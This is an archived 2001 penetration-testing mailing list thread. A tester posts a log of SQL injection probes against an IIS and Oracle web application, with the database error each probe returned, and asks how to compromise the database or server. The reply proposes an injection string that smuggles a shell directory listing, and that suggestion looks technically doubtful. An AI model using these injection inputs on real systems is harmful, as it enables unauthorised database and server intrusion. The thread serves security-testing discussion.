|
Penetration Testing
mailing list archives
Re: SQL INJECTION - ORACLE
From: "Michael Haunzwickl" <michael.haunzwickl () roehrer com>
Date: Mon, 10 Dec 2001 18:25:06 GMT
Hm ...
I would try:
Input: select * from ' & shell (Dir c:\) & ' sys.tab$
this will hopefully give you a dir of c:\
Best regards
Der Schakal
Ursprüngliche Nachricht <<<<<<<<<<<<<<<<<<
Am 10.12.2001, 17:06:05, schrieb "foo bar" <badb0t () hotmail com> zum Thema
SQL INJECTION - ORACLE:
Hello
I am performing a vulnerability test against a web application and would
like some advice. The application is running IIS 4.0 - all the remote
exploits are patched. The backend is just a bunch of VB scripts, getting
info from an oracle8 server on AIX.
Most of the places where input is accepted must strip out unexpected
characters, but I located one field on a form where input was not
properly
validated. I've tried posting different strings into the field with
limited
success. All I'm able to get is errors back. I'd like to take advantage
of
some stored procedures in oracle. Could you look at the log of my
activity
below and provide advice on where to go next in order to compromise the
database, or the server itself? I'd even be happy with the ability to
run a
successful query through injection. It looks like their using a package
or
stored procedure to post the query, and I'm having trouble breaking out
of
it. Is it possible, if so, how should I go about it?
Input: '
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00907: missing right
parenthesis
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ')
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00923: FROM keyword not
found
where expected
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00903: invalid table name
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from policy
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00933: SQL command not
properly ended
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from policy -- "'"
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-06553: PLS-306: wrong
number
or types of arguments in call to 'GETPOLICYNUMBER'
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from getpolicynumber -- "'"
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-04044: procedure,
function,
package, or type is not allowed here
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
_________________________________________________________________
Get your FREE download of MSN Explorer at
http://explorer.msn.com/intl.asp
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
 By Date 
By Thread
Current thread:
| 
Intro
